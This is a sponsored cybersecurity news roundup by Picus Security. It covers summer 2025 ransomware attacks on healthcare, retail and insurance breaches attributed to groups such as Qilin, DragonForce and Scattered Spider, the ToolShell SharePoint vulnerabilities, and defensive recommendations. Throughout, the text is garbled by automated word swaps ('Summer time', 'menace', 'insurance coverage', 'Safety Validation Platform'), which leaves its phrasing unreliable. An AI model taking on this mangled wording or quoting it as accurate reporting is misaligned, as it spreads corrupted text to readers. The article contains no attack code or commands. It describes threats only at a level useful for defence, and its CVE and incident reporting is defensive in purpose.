Summer time 2025 wasn’t simply sizzling; it was relentless.
Ransomware hammered hospitals, retail giants suffered data breaches, insurance coverage companies have been hit by phishing, and nation-state actors launched disruptive campaigns.
From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers stored defenders on their heels.
This report breaks down the season’s most high-impact incidents and what security groups must do earlier than the subsequent wave hits.
Summer time Expose Healthcare’s Rising Ransomware Danger
Hospitals cannot afford downtime, and attackers comprehend it.
This summer time, ransomware teams focused healthcare, exploiting each the worth of affected person information and the urgency of care.
Interlock rises as a serious menace to US healthcare
A July 22, 2025, joint advisory by CISA, FBI, and HHS highlighted Interlock as a serious menace to the Healthcare and Public Well being (HPH) sector. The group is linked to round 14 incidents in 2025 alone, with a 3rd affecting solely healthcare suppliers.
What units Interlock aside is its use of “FileFix,” a PowerShell launcher that hides malicious scripts behind decoy file paths. It methods customers into operating payloads by way of File Explorer, bypassing typical security detections.
Rhysida ransomware focused one other US healthcare middle
On July 8, 2025, the Rhysida ransomware group allegedly leaked delicate information from Florida Hand Middle, together with medical photos, driver’s licenses, and insurance coverage varieties.
The clinic, which serves sufferers in Punta Gorda, Port Charlotte, and Fort Myers, was given simply seven days to reply earlier than the discharge.
Qilin recycles Scattered Spider playbook in wave of healthcare breaches
In June 2025, Qilin grew to become essentially the most lively ransomware group, recording 81 victims, 52 of them within the healthcare sector.
The group exploited unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to achieve entry, deploy ransomware, and exfiltrate delicate information comparable to EHRs and insurance coverage data.
To maximise strain, Qilin went past encryption, leveraging legal-themed extortion ways like a “Name Lawyer” function and automatic negotiation instruments to drive quicker payouts.
Proactively check and validate your security controls towards Summer time 2025’s most impactful threats—together with Interlock, Qilin, DragonForce, Scattered Spider, and ToolShell—with the Picus Safety Validation Platform.
Begin your 14-day free trial now and uncover your readiness in minutes.
Check with a Free Trial
Main Manufacturers Breached in Retail Cybercrime Wave
The retail sector could not escape the wave of cyberattacks sweeping by way of Summer time 2025.
Louis Vuitton breach marks third in 1 / 4
On July 2, 2025, Louis Vuitton UK suffered a data breach exposing buyer contact information and buy historical past, its third LVMH model breach in three months after Dior and LV Korea.
Days later, on July 10, UK police arrested 4 suspects tied to high-profile assaults on M&S, Co-op, and Harrods.
The group is allegedly linked to Scattered Spider, a home menace actor recognized for social engineering and collaboration with ransomware operators like DragonForce, signaling the rising influence of homegrown cybercriminals on main retailers.
DragonForce hits US retail chain Belk
Between Might 7 and 11, 2025, on the opposite aspect of the Atlantic, North Carolina, based mostly retailer Belk suffered a data breach.
DragonForce claimed accountability, stating it exfiltrated 156 GB of buyer and worker information, together with names, Social Safety numbers, emails, order histories, and HR information, which have been later posted on its leak website after ransom negotiations stalled.
DragonForce, first rising in late 2023, operates as a ransomware-as-a-service cartel, itemizing roughly 136 victims by March 2025, lots of whom are in US and UK retail organizations.
Scattered Spider’s ways have shifted from retail to insurance coverage
Scattered Spider (UNC3944), a local English-speaking cybercriminal collective, used identity-centric social engineering, voice phishing, MFA fatigue, help-desk impersonation, and typosquatted domains to breach UK retailers (M&S, Co-op, Harrods) in April–Might 2025.
In mid-June 2025, the researchers flagged that Scattered Spider (UNC3944) had shifted from retail to concentrating on US insurance coverage companies.
-
Aflac detected and contained unauthorized entry on June 12, 2025; buyer and worker private information (together with SSNs, well being claims) could have been compromised.
-
Erie Insurance coverage and Philadelphia Insurance coverage Corporations additionally reported comparable cyber disruptions in early to mid-June, leading to operational downtime.
The intrusions matched Scattered Spider’s recognized tactical profile, although no ransomware was deployed, and programs remained operational.
State-Sponsored and Geopolitical Cyber Exercise
Not all cyber threats this summer time have been about cash.
Nation-state hackers and hacktivists additionally made their mark, utilizing the turbulent geopolitical local weather to launch assaults.
-
June 14–17, 2025: Professional-Israel hacktivist group Predatory Sparrow hit Iran’s Financial institution Sepah, disrupting banking providers, then destroyed ~$90M in crypto by breaching Nobitex and sending tokens to burn wallets.
-
June 30, 2025: The US Division of Homeland Safety and CISA issued a joint alert warning of impending Iranian cyber retaliation concentrating on crucial infrastructure within the US and Europe.
These incidents function a stark reminder that cyber battle is now a frontline extension of geopolitical pressure, one that may ripple far past borders and sectors.
Key Vulnerabilities Gaining Public Consideration
A number of Microsoft SharePoint vulnerabilities have been exploited this summer time in a widespread cyber espionage marketing campaign often known as ToolShell.
-
CVE-2025-53770 is a crucial distant code execution flaw permitting unauthenticated attackers to run arbitrary code on weak on-prem SharePoint servers. Menace actors used it to deploy internet shells, steal credentials, and transfer laterally by way of enterprise networks. CISA added the bug to its KEV catalog on July 20, 2025.
-
CVE-2025-49704 and CVE-2025-49706 have been additionally added to the KEV on July 22 after being abused in chained assaults. The pair permits authentication bypass and code injection, permitting attackers to take advantage of unpatched SharePoint programs even when earlier fixes have been utilized.
The ToolShell marketing campaign focused organizations throughout the US, Europe, and the Center East, together with authorities companies, vitality companies, and telecom suppliers.
Safety researchers say the attackers doubtless reverse-engineered Microsoft’s July Patch Tuesday fixes to develop the bypass utilized in CVE-2025-53770.
What to Take from the Summer time Wildfires in Cybersecurity?
From hospitals to retail giants and insurance coverage suppliers to nation-states, the season uncovered cracks in even essentially the most fortified environments.
Here is what security groups ought to do subsequent.
Patch like your life relies on it, as a result of they do in crucial sectors.
Begin with CISA KEV entries and high-severity CVEs, however do not cease there. Ask the tougher query: are you the type of goal that attackers go after?
Validate whether or not every CVE is definitely exploitable in your surroundings.
Deal with exploit chains, not simply the scores. That is what adversaries are doing.
Harden id as your new perimeter.
Social engineering labored higher than malware this summer time. Cease MFA fatigue assaults, reinforce help-desk verification, and restrict privileged entry.
Prepare your people, as a result of they have been the breach level.
Scattered Spider and others did not exploit a CVE; they exploited an individual. Run common simulations, replace phishing situations, and put together high-risk roles for real-world lures.
Look ahead to what occurs after preliminary entry.
Menace actors like Interlock and Qilin did not simply drop ransomware; they moved laterally, staged information, and evaded detection. Implement behavioral monitoring for methods, comparable to PowerShell abuse, credential theft, and stealthy exfiltration.
Do not ignore legacy programs and neglected infrastructure.
Do not ignore legacy programs and neglected infrastructure. The ToolShell marketing campaign exploited unpatched on-prem SharePoint servers, many operating unsupported or outdated variations.
Whether or not it is growing older on-prem SharePoint, home equipment, or unmonitored legacy gear, isolate what you’ll be able to’t improve, monitor what you’ll be able to’t patch, and exchange what you have ignored.
We strongly recommend simulating the talked about assaults to check the effectiveness of your security controls towards real-life cyber assaults utilizing the Picus Safety Validation Platform.
It’s also possible to check your defenses towards a whole bunch of different malware and exploitation campaigns, comparable to Medusa, Rhysida, and Black Basta, inside minutes with a 14-day free trial of the Picus Platform.
Sponsored and written by Picus Safety.
